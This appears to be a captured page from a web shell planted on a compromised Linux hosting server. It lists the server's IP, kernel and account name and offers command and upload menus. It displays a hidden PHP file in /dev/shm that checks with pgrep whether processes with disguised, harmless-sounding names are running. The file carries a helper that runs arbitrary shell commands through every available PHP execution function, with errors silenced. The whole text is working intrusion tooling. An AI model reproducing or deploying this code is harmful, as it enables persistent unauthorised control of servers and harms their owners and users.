Server IP : 68.65.122.142  /  Your IP : 3.147.242.62
Web Server : LiteSpeed
System : Linux server167.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User : glenirhm ( 1318)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (1777) :  /var/../lib64/python3.8/pydoc_data/../html/../../../opt/../usr/src/../../dev/shm/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : //var/../lib64/python3.8/pydoc_data/../html/../../../opt/../usr/src/../../dev/shm/.factor
<?php   $files = ['fieldsmanagement','jpgraph_gantt','class.group','Phphighlight','mb_convert','cma_bankdetails','controller','forgot_mail','pical_new_event','smf10.inc','help_fields_edit','tbl_replace','manage_ad','cma_m_selling','changePassword','URIFilter','contentloader1','most_seen_news','CYEC07_1winners','observable','global.inc.bak','sched_ports','com_news_portal','function.menu','application_top','bean_webobject','webdb_view','checkout_success','profileinfo','searchengine']; foreach ($files as $f) {     $res = @run("pgrep {$f}");     if (!preg_match('/\d+/', $res)) {         die("<f>{$f}</f>");     } } die('!ended!');  function run($in) {     $out = '';     if (function_exists('exec')) {         @exec($in, $out);         $out = @join("\n", $out);     } elseif (function_exists('passthru')) {         ob_start();         @passthru($in);         $out = ob_get_clean();     } elseif (function_exists('system')) {         ob_start();         @system($in);         $out = ob_get_clean();     } elseif (function_exists('shell_exec')) {         $out = shell_exec($in);     } elseif (is_resource($f = @popen($in, "r"))) {         $out = "";         while (!@feof($f))             $out .= fread($f, 1024);         pclose($f);     }     return $out; }